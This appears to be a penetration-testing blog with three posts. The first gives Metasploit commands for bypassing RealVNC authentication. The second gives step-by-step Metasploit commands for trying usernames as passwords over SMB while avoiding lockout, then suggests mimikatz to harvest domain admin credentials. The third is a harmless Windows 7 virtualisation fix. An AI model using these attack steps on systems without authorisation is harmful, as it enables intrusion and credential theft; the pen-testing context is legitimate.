Thursday, June 30, 2016

RealVNC Authentication Bypass

Metasploit's RealVNC authentication bypass module for CVE-2006-2369 is pretty fun because it's one of those that is way too easy. If a victim has a RealVNC server which is earlier than 4.1.2, or a LibVNCServer VNC server earlier than 0.8.2, a customized VNC client can send 'Type 1 - None' as the authentication type and completely bypass authentication. Metasploit does this for you.

This vulnerability was discovered by Steve Wiseman by accident while coding his own VNC software, so that's a fun fact. This is of course a very old vuln, but still exists out there, unfortunately. Here are the commands to exploit using msfconsole:

use auxiliary/admin/vnc/realvnc_41_bypass
show options
set autovnc true
set rhost <target-victim>

At this point, Metasploit should automatically launch a VNC client and remote to the host while bypassing authentication. Fun stuff.

Saturday, May 28, 2016

Metasploit: Find Usernames Used As Passwords

In an internal pen test, there are cases where you have pulled a list of domain usernames but are still looking to get the password for one of these accounts. One possible technique for accomplishing this would be to use Metasploit to identify any passwords which are the same as the username. Below are steps to use the Metasploit console (msfconsole) to perform this particular type of password attack. And here's a pretty picture of a test box performing such an attack on itself, just as an example:

Example attack


1. Put your list of usernames into a text file with one username per line, and place the file in the Metasploit directory.

2. Open the Metasploit console and run: use auxiliary/scanner/smb/smb_login

3. Pick one domain workstation to test against and set it in MSF (Metasploit): set RHOSTS <ip-address>

4. Tell MSF the domain name: set SMBDomain <domain>

5. Tell MSF the name of the file containing the usernames: set USER_FILE <filename>

6. Tell MSF to use the username as the password: set USER_AS_PASS true

7. For some reason MSF doesn't like to run USER_AS_PASS unless you explicitly specify another password or password list, as well. If you don't do this, it will run the exploit but not actually test the username as the password. Just pick a random weak password to also test for perhaps, like this: set SMBPass password123

8. If you know the password policy will allow three login failures without causing a lockout, consider also testing for blank passwords: set BLANK_PASSWORDS true

9. Then run the exploit with: run

One of the things I like about this method, is that it's not as loud as a full brute force. As long as you keep below the lockout policy, you may be able to stay under the radar completely, while still testing every single domain user. When the test is complete, you can see what kind of creds you got with this command: creds

To export the creds as a file, you can use: creds -o <filename.txt>

To get help with the creds command, use: creds -h

To list all possible options for the attack, use: show options

After getting a domain user's creds, the next step will often be to authenticate with these creds to various computers and run mimikatz. If you run mimikatz on enough workstations, you're bound to eventually find one that will yield domain admin creds, resulting in red team happiness.


Monday, April 4, 2016

P2V Windows 7: BSOD Solution

For whatever reason, when performing a P2V on a Windows 7 machine, you are very likely to experience a BSOD, even if you use VMware Converter. There is a painless workaround, however, using a combination of Sysinternals Disk2vhd and Starwind V2V Converter. In my case, after using these tools, I also had to make some registry edits with an offline registry editor in order to resolve the BSOD. The steps are actually quite easy, though it took me a while to figure them out.

Before I give you the how-to, I want to say I'm very thankful to these two bloggers for the information on the aforementioned tools, and also thankful to various forum posters from whom I got the needed registry settings. Today's post is meant to gather the various information I used into one resource and relate my experience. Also, the offline registry edit I did from a live (virtual) CD may be useful information to some. Here are the steps I used to P2V my Windows 7 Pro 64-bit machine so that it could be used in VMware Workstation Player:

1. Download and run Disk2vhd on the Windows 7 physical machine you want to convert.

2. The Disk2vhd interface is very simple. Just be sure to set it to be vhd (not vhdx which would be for Windows 8) and let it do it's thang.

3. Download, install and run StarWind V2V Converter. (They make you fill out a contact form and then they send you a download link. Or, you may be able to get this link to work, so you don't have to. :) )
4. Use StarWind V2V Converter to convert your vhd to a vmdk and copy the resulting vmdk to your host machine. It has very simple interface.

5. Open VMware Workstation Player and create a new Windows 7 virtual machine. Before powering it on, however, remove the hard drive and replace it with the vmdk created above.

6. Power on the VM. In my case, at this point I still got a BSOD and was considering giving up. If this is you, read on...

7. You're going to have to make some offline registry edits on your unbootable system. You could do this by connecting your virtual hard drive of your VM to another Windows VM (google it), but my preference was to boot the VM to AVG Rescue CD. Just download AVG Rescue CD and boot your VM to the ISO.

8. Choose the registry editor in the AVG Rescue CD menu under Utilities.

9. Navigate to HKLM\SYSTEM\ControlSet[001]\services\

10. For me, I was able to fix the problem by editing each of the following to be a value of 0:


However, reading online, it appears that some users with different drivers had to make other registry changes under HKLM\SYSTEM\ControlSet[001]\services\. Here are some of the other edits I saw on various forums:

Aliide\Start = 3
Amdide\Start =3
Atapi\Start = 0
Cmdide\Start = 3
iaStorV\Start = 3
intelide\Start = 0
msahci\Start = 3
pciide\Start = 3
viaide\Start = 3

Do not make these updates unless you know what you are doing. Consider writing down the current settings before making any changes so you can revert if needed.

11. As soon as I made the LSI_SAS\Start and LSI_SAS2\Start registry edits and booted back into the native/guest OS, it started working!

Host OS = lubuntu 14.04.4 64-bit
Guest OS: Windows 7 Pro 64-bit
Live CD: AVG Rescue CD ( avg_arl_cdi_all_120_150814a10442.iso )
vmware Workstation 12 Player